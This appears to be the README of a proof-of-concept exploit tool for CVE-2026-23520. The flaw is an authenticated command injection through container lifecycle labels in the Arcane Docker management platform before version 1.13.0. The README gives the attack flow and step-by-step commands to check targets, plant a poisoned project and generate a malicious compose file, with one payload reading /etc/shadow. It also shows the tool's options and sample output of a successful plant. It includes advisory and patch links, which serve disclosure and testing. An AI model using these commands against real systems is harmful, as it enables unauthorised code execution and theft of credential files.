Share
## https://sploitus.com/exploit?id=12B0F910-8CC7-5FDB-A55D-2C3510845950
# CVE-2026-23520 โ Arcane Lifecycle Label RCE
> **OS Command Injection in Arcane Docker Management (< 1.13.0)**
## Overview
[Arcane](https://getarcane.app/) is a modern, web-based Docker management platform. Versions prior to **1.13.0** are vulnerable to an authenticated **Remote Code Execution (RCE)** via OS command injection in the updater service's lifecycle labels.
The updater service supported two Docker container labels:
| Label | Trigger |
|---|---|
| `com.getarcaneapp.arcane.lifecycle.pre-update` | Before a container update |
| `com.getarcaneapp.arcane.lifecycle.post-update` | After a container update |
The label value is passed **directly** to `/bin/sh -c` without any sanitization. Because **any authenticated user** (not just administrators) can create projects through the API, an attacker can plant a poisoned project. When an admin later triggers a container update, the injected command executes inside the container โ and potentially on the host if volume mounts are present.
## Attack Flow
```
Attacker (low-priv user) Arcane Server
โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโ
1. Authenticate (any user) โโโโโโโโโโโบ JWT issued
2. Create project with Project saved with
poisoned lifecycle label โโโโโโโโโโโบ malicious label
โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ 3. Admin triggers container update
โผ
Arcane updater reads label value
Passes it to /bin/sh -c
โ
โผ
*** Arbitrary command execution ***
(container scope, or host if volumes mounted)
```
## Affected Versions
| Status | Versions |
|---|---|
| **Vulnerable** | Arcane < 1.13.0 |
| **Patched** | Arcane โฅ 1.13.0 |
The fix ([commit `5a9c2f9`](https://github.com/getarcaneapp/arcane/commit/5a9c2f92e11f86f8997da8c672844468f930b7e4)) completely removes the lifecycle label feature to eliminate the attack surface.
## Usage
The PoC is a single Python 3 script with **zero external dependencies**.
### Check if a target is vulnerable
```bash
python3 poc_cve_2026_23520.py check -t
```
### Deploy the exploit
```bash
python3 poc_cve_2026_23520.py exploit \
-t \
-u \
-p \
--payload "id"
```
### Generate a poisoned compose file (offline)
```bash
python3 poc_cve_2026_23520.py generate --payload "cat /etc/shadow"
```
### Full options
```
usage: poc_cve_2026_23520.py exploit [-h] -t TARGET [-P PORT] -u USERNAME
-p PASSWORD [--payload PAYLOAD]
[--hook {pre,post}]
[--project-name PROJECT_NAME]
[--env-id ENV_ID]
[--scheme {http,https}]
[--no-verify]
```
| Flag | Description | Default |
|---|---|---|
| `-t, --target` | Arcane host (IP or hostname) | *required* |
| `-P, --port` | Arcane port | `3552` |
| `-u, --username` | Any authenticated Arcane user | *required* |
| `-p, --password` | User password | *required* |
| `--payload` | Shell command to inject | `id` |
| `--hook` | `pre` or `post` update hook | `pre` |
| `--project-name` | Name for the poisoned project | `poc-cve-2026-23520` |
| `--env-id` | Environment ID (auto-detected if omitted) | auto |
| `--scheme` | `http` or `https` | `http` |
| `--no-verify` | Skip TLS certificate verification | off |
## Example Output
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-23520 PoC Exploit โ
โ Arcane < 1.13.0 โ Lifecycle Label RCE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ Step 1 ยท Fingerprinting Target โโ
[*] Target: http://192.168.1.10:3552
[+] Arcane version: v1.12.4
[+] Version v1.12.4 is < 1.13.0 โ VULNERABLE
โโ Step 2 ยท Authentication โโ
[*] Authenticating as attacker โฆ
[+] Authentication successful โ JWT obtained
โโ Step 3 ยท Environment Discovery โโ
[*] Enumerating environments โฆ
[*] โ 1 (local)
[+] Using environment: 1
โโ Step 4 ยท Planting Poisoned Project โโ
[*] Injecting payload into lifecycle label: pre-update
[*] Label : com.getarcaneapp.arcane.lifecycle.pre-update
[*] Value : id
[+] Poisoned project created successfully
โโ Exploit Planted Successfully โโ
[+] The poisoned project is now waiting for an update trigger.
```
## References
- **Advisory:** [GHSA-gjqq-6r35-w3r8](https://github.com/getarcaneapp/arcane/security/advisories/GHSA-gjqq-6r35-w3r8)
- **NVD:** [CVE-2026-23520](https://nvd.nist.gov/vuln/detail/CVE-2026-23520)
- **Fix commit:** [`5a9c2f9`](https://github.com/getarcaneapp/arcane/commit/5a9c2f92e11f86f8997da8c672844468f930b7e4)
- **Patched release:** [v1.13.0](https://github.com/getarcaneapp/arcane/releases/tag/v1.13.0)
## Disclaimer
This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. The author is not responsible for any misuse. Only use this against systems you own or have explicit written permission to test.
## License
MIT